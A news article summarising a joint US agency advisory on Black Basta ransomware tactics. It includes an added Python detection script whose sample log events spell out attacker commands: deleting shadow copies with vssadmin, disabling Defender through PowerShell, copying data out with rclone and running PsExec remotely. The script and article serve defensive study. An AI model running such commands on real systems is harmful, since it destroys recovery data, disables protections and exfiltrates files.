Cybersecurity agencies share TTPs and IoCs related to Black Basta ransomware


The US Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) have released a joint cybersecurity advisory on Black Basta ransomware activity. This initiative is part of the broader StopRansomware campaign aimed at combating cyber threats.

Black Basta, a ransomware-as-a-service (RaaS) variant, has recently ramped up its attacks on critical infrastructure sectors, with a particular focus on Healthcare and Public Health. The advisory highlights the Tactics, Techniques, and Procedures (TTPs) employed by the threat actors, along with Indicators of Compromise (IoCs) obtained from law enforcement investigations and intelligence provided by third-party security firms.

Black Basta affiliates primarily rely on spearphishing to gain initial access. In addition, cybersecurity researchers have noted instances where affiliates utilized the Qakbot malware during this phase.

Since February 2024, Black Basta operators have been exploiting vulnerabilities in ConnectWise software (CVE-2024-1709). They have also been observed abusing valid credentials in some cases. To conduct network scanning, Black Basta affiliates utilize tools like the SoftPerfect network scanner (netscan.exe). For reconnaissance they use utilities given innocuous file names such as Intel or Dell, often left in the root of the C: drive to avoid raising suspicion.

For lateral movement, Black Basta affiliates employ tools such as BITSAdmin, PsExec, and Remote Desktop Protocol (RDP). Some also utilize Splashtop, ScreenConnect, and Cobalt Strike beacons for remote access and further lateral movement.

In terms of privilege escalation, Mimikatz is a favored credential scraping tool. Additionally, Black Basta affiliates have exploited vulnerabilities including ZeroLogon (CVE-2020-1472), NoPac (CVE-2021-42278 and CVE-2021-42287), and PrintNightmare (CVE-2021-34527) for local and Windows Active Directory domain privilege escalation.

For data exfiltration, Black Basta affiliates rely on RClone. Before exfiltrating data, they often use PowerShell to disable antivirus products and may deploy Backstab, a tool designed to disable endpoint detection and response (EDR) tooling. Following termination of antivirus programs, files are fully encrypted using the ChaCha20 algorithm with an RSA-4096 public key. File names are suffixed with a .basta extension, and a ransom note titled readme.txt is left on the compromised system. To impede system recovery, affiliates use vssadmin.exe to delete volume shadow copies.
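The TTPs listed above (netscan.exe, PsExec, BITSAdmin, RClone, PowerShell antivirus tampering, vssadmin shadow copy deletion, and vendor-named binaries dropped in C:\) map naturally onto process-creation detection rules. The following is an added example, not code from the advisory or the agencies that issued it; the log events are constructed, and matching `Set-MpPreference` is an assumption about how "PowerShell used to disable antivirus" appears in telemetry.

```python
import re

# Constructed process-creation events (image path, command line); these are
# illustrative samples, not telemetry from the advisory.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    (r"C:\Intel.exe", "Intel.exe /range:10.0.0.0/24"),
    (r"C:\Users\ops\rclone.exe", r"rclone.exe copy D:\finance remote:bucket --transfers 32"),
    (r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p"),
    (r"C:\Windows\PsExec.exe", r"PsExec.exe \\fileserver01 -s cmd.exe"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden Set-MpPreference -DisableRealtimeMonitoring $true"),
    (r"C:\Users\ops\netscan.exe", r"netscan.exe /hide /auto:C:\scan.xml"),
]

# Command-line patterns derived from the TTPs in the text. The Set-MpPreference
# rule is an assumption (one common way PowerShell is used to switch off AV);
# the other tool names are taken directly from the advisory summary.
COMMAND_RULES = {
    "shadow_copy_deletion": re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I),
    "softperfect_netscan": re.compile(r"\bnetscan\.exe\b", re.I),
    "rclone_exfiltration": re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I),
    "psexec_lateral_movement": re.compile(r"\bpsexec(\.exe)?\s+\\\\", re.I),
    "bitsadmin_lateral_movement": re.compile(r"\bbitsadmin(\.exe)?\s+/transfer\b", re.I),
    "powershell_av_disable": re.compile(r"Set-MpPreference\b.*-Disable\w+", re.I),
}

# Executables named "Intel..." or "Dell..." sitting directly in the root of a
# drive rather than under Program Files: the innocuous-name tradecraft above.
ROOT_DROP_RULE = re.compile(r"^[A-Z]:\\(Intel|Dell)[^\\]*\.exe$", re.I)

def classify_event(image, cmdline):
    """Return the names of every rule an event trips (empty list if benign)."""
    hits = [name for name, pat in COMMAND_RULES.items() if pat.search(cmdline)]
    if ROOT_DROP_RULE.match(image):
        hits.append("innocuous_name_in_root_drive")
    return hits

def triage(events):
    """Map each flagged event index to its rule hits; benign events are omitted."""
    findings = {}
    for idx, (image, cmdline) in enumerate(events):
        hits = classify_event(image, cmdline)
        if hits:
            findings[idx] = hits
    return findings

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: {SAMPLE_EVENTS[idx][1]!r} -> {hits}")
```

Any single hit is worth a look, but several of these rules firing on one host within a short window (shadow copy deletion after an AV disable, say) is the sequence the advisory describes and should page someone.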

Since its emergence in April 2022, Black Basta has targeted over 500 organizations worldwide, including both private industry and critical infrastructure entities. The ransomware gang's activities have affected numerous businesses and vital infrastructure facilities in North America, Europe, and Australia.

British blockchain analytics firm Elliptic revealed last year that the group has amassed an estimated $107 million in Bitcoin ransom payments since its inception, with the majority of funds laundered through the Russian cryptocurrency exchange Garantex.
